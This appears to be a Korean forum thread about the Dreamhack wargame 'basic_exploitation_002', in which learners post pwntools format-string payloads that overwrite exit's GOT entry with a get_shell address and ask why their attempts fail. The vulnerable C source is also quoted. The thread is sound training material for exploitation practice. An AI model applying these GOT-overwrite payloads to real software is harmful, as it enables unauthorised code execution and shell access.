basic_exploitation_002

바이너리를 로컬에 다운로드 후 강의에서처럼 명령 프롬프트에 %hn 2번 쓰고 ;cat;붙이니 쉘에 떨어지는데 pwntools을 통해서 로컬 프로세스를 열어 하려니 안되네요. 제가 뭘 잘못 짚고 있는지요? 고수님들 한수 부탁드립니다.

exit = e.got['exit'] payload = p32(exit+2) + p32(exit) + '%2044c%1$hn%32261c%2$hn' exit 크기가 크기 때문에 둘로 나누어야 한다고 하는데, 왜 안되는지 잘 와닿지 않습니다. 파이썬에서 exit+2 이 0x08048609 의 0x0804 앞부분을 가리키는지 잘 이해가 안됩니다.

일단 exit_got을 get_shell 함수 주소로 바꾸는 흐름으로 진행하고 payload를 개념 내용에서 보았던 내용으로 payload를 작성해 봤는데 뭐가 문제일까요..? exit_got_addr : 0x0804a024 get_shell_addr : 0x08048609 fstring = f"%{0x04}c%13$hhn".encode() fstring += f"%{0x08 - 0x04}c%14hhn".encode() fstring += f"%{0x09 - 0x08}c%11hhn".encode() fstring += f"%{0x86 - 0x09}c%12hhn".encode() fstring = fstring.ljust(40,b'a') fstring += p32(exit_got) fstring += p32(exit_got+1) fstring += p32(exit_got+2) fstring += p32(exit_got+3) `

안녕하세요. 해당 바이너리에서는 아래와 같이 FSB 취약점이 존재하여, get_shell의 주소를 임의의 주소에 대입할 수 있는 문제입니다. void get_shell() { system("/bin/sh"); } int main(int argc, char *argv[]) { char buf[0x80]; initialize(); read(0, buf, 0x80); printf(buf); exit(0); } 여기서 exit(0);이라는 코드가 실행되는 코드 섹션이 아래와 같이 0x08048648 인데, image.png 의미가 없는 질문이긴 하지만, 혹시 만약 코드 섹션에 쓰기 권한이 존재했다면, 0x08048648에 get_shell의 주소를 대입해줬다면 익스플로잇이 될까요 ? 코드 섹션에는 인스트럭션 내용이 들어가야 하기 때문에 함수 주소가 들어가도 익스플로잇이 안되겠죠..?

생각 순서는 이렇습니다. 우선 checksec 을 통해 운영체제를 확인하여 32bit 인것을 확인하였습니다. printf(buf); 코드를 보고 난 후, 이 부분에서 FSB 를 통해 메모리 주소값을 얻어내면 되겠구나. exit(0) 으로 끝나, ret 값이 없는건가? exit 함수는 got 에 주소값이 있다. 그럼 이 부분을 Got overwrite 를 해보자. got overwrite 를 통해서 exit_got 값 에는 get_shell 함수의 주소가 들어가면 메인함수가 실행되면서 system('/bin/sh'); 이 실행되겠지. 위와 같은 순서로 shellcode 를 작성하였습니다. 따라서 read를 통해 AAAA %p %p %p %p %p --- 를 넣어, AAAA 가 어디에 값이 들어가는지 offset 을 확인했더니, 1번째 offset 에서 값이 나오는 것을 확인할 수 있었습니다. ( 스택으로 인자를 전달해서 1번째인것인가? 라는 의문을 가졌습니다. %p 를 여러번 하였을 때, 아래와 같은 구조가 나와 어떻게 분석을 해야하지? 에 대해서도 물어보고 싶습니다.. ) image.png 그래서 이 부분에 ELF로 구한 exit의 got주소를 넣었습니다. 이후 got 주소를 출력해보았을 때, 8byte 를 차지하고 있는 것으로 보아, get_shell의 주소 ( gdb 를 통해 얻었습니다. )를 4byte 씩 나누어 1번째 offset 과 2번째 offset에 집어넣었습니다. 1번째 offset 의 경우, 앞서 구한 got의 주소를 넣은 부분의 크기만큼 빼주었고 값을 집어넣었다 생각했는데, 쉘이 EOF로 끊기고 맙니다. 질문은 아래와 같습니다. 어떤 부분에서 잘못되었나요? 위와 같이 AAAA %p %p .. 를 하였을 때, 스택 구조에 대해서 어떻게 해석을 하면 되나요?

`from pwn import * port = 23731 p = remote('host3.dreamhack.games', port) exit = 0x804a024 get_shell = 0x8048609 payload = b'%2052c' payload += b'%5$hn' payload += b'%32256c' payload += b'%6$hn' payload += b'A'*3 payload += p32(exit+2) payload += p32(exit) p.send(payload) p.interactive() ` 한 번 exit의 주소값을 가장 마지막에 넣어서 해볼려고 했습니다. 먼저 주소 앞에 16비트만큼이 차지되기 때문에 %5$에 0x804를 넣었고, %6$에 앞에서 사용된 값들을 더한 0x809로 0x8609를 뺀 값을 넣어주었습니다. 하지만 제대로 실행되지 않습니다. 어디서 잘못된것인가요?